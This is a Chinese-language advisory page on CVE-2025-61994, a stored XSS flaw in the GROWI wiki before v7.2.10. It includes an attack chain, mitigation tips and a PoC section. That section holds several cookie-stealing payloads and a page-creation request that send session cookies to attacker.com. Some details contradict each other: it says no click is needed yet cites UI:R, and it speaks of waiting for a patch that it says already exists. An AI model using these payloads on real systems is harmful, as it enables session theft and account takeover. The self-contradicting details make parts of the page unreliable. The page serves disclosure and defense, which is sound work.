CVE-2025-61994: GROWI跨站脚本(XSS)漏洞

漏洞信息

漏洞编号

CVE-2025-61994

漏洞类型

XSS (跨站脚本攻击)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

GROWI

漏洞概述

CVE-2025-61994是GROWI协作平台中存在的一个存储型跨站脚本（Stored XSS）漏洞。GROWI是一款开源的企业级Wiki和知识管理工具，广泛应用于团队文档协作场景。该漏洞影响v7.2.10之前的所有版本。攻击者通过在GROWI平台上创建包含恶意脚本代码的页面，当其他用户访问该页面时，嵌入的恶意JavaScript代码将在受害者浏览器上下文中执行。攻击者可利用此漏洞窃取用户会话Cookie、劫持用户账户、进行钓鱼攻击或传播恶意内容。由于GROWI常用于企业内部文档共享，攻击者只需获得低权限账户即可实施攻击，且无需目标用户点击任何链接，仅访问页面即可触发漏洞。这种攻击的隐蔽性使得漏洞具有较高的实际危害性。

技术细节

该漏洞为存储型XSS，存在于GROWI的页面渲染模块。攻击者创建一个包含恶意JavaScript代码的页面，利用GROWI对用户输入内容的安全过滤不完善，将恶意代码保存到数据库。当其他用户访问该页面时，GROWI从数据库读取内容并渲染到HTML页面时，未对恶意代码进行充分转义或过滤，导致攻击者的JavaScript代码被浏览器作为合法脚本执行。攻击者可构造的payload示例：<img src=x onerror=alert(document.cookie)>、<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>等。CVSS 3.0向量显示攻击复杂度低（AC:L），需要低权限（PR:L）且需要用户交互（UI:R），但攻击范围已改变（S:C），表明漏洞可影响多个用户。由于GROWI的Wiki页面通常会被多个用户访问，攻击者创建的一个恶意页面可能影响大量访问者。

攻击链分析

STEP 1

侦察阶段

攻击者识别目标GROWI实例版本，确认版本低于v7.2.10

STEP 2

初始访问

攻击者获取GROWI平台的低权限账户（PR:L），如普通用户或访客账户

STEP 3

载荷构造

攻击者构造XSS payload，如<img src=x onerror=alert(document.cookie)>

STEP 4

页面创建

攻击者在GROWI中创建新页面，将恶意代码嵌入页面内容并保存

STEP 5

载荷存储

恶意代码被存储到GROWI数据库，作为页面内容的一部分持久化

STEP 6

触发执行

受害者访问攻击者创建的恶意页面，GROWI渲染页面时未过滤恶意代码

STEP 7

会话窃取

恶意JavaScript在受害者浏览器执行，窃取Cookie并发送到攻击者服务器

STEP 8

账户劫持

攻击者使用窃取的Cookie劫持受害者会话，执行未授权操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-61994 PoC - Stored XSS in GROWI // Target: GROWI < v7.2.10 // Author: [email protected] // Method 1: Image tag with onerror handler const payload1 = '<img src=x onerror="fetch(`https://attacker.com/steal?c=${document.cookie}`)">'; // Method 2: Script tag injection const payload2 = '<script>document.location="https://attacker.com/steal?c="+document.cookie</script>'; // Method 3: SVG element with onload const payload3 = '<svg onload="fetch(`https://attacker.com/steal?data=${btoa(document.cookie)}`)">'; // Exploitation steps: // 1. Attacker with low-privilege account creates a new page // 2. Insert XSS payload into page content // 3. Save and publish the page // 4. When victim views the page, XSS payload executes // Example request to create malicious page: /* POST /_api/pages HTTP/1.1 Host: target-growi-server.com Content-Type: application/json Cookie: [attacker_session_cookie] { "body": "<img src=x onerror=\"fetch('https://attacker.com/steal?c='+document.cookie)\">", "format": "markdown", "path": "/MaliciousPage" } */

影响范围

GROWI < v7.2.10

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1) 限制用户创建页面的权限，仅允许受信任的管理员创建页面；2) 启用GROWI的内容过滤插件；3) 在反向代理层配置XSS防护规则；4) 提醒用户不要点击来源不明的页面链接；5) 监控异常的网络请求和页面访问模式；6) 考虑临时禁用页面创建功能直到完成升级。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-61994
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-61994
3 Details https://www.cvedetails.com/cve/CVE-2025-61994/
4 VulDB https://vuldb.com/cve/CVE-2025-61994
5 Link https://growi.co.jp/news/39/
6 Link https://jvn.jp/en/jp/JVN95942191/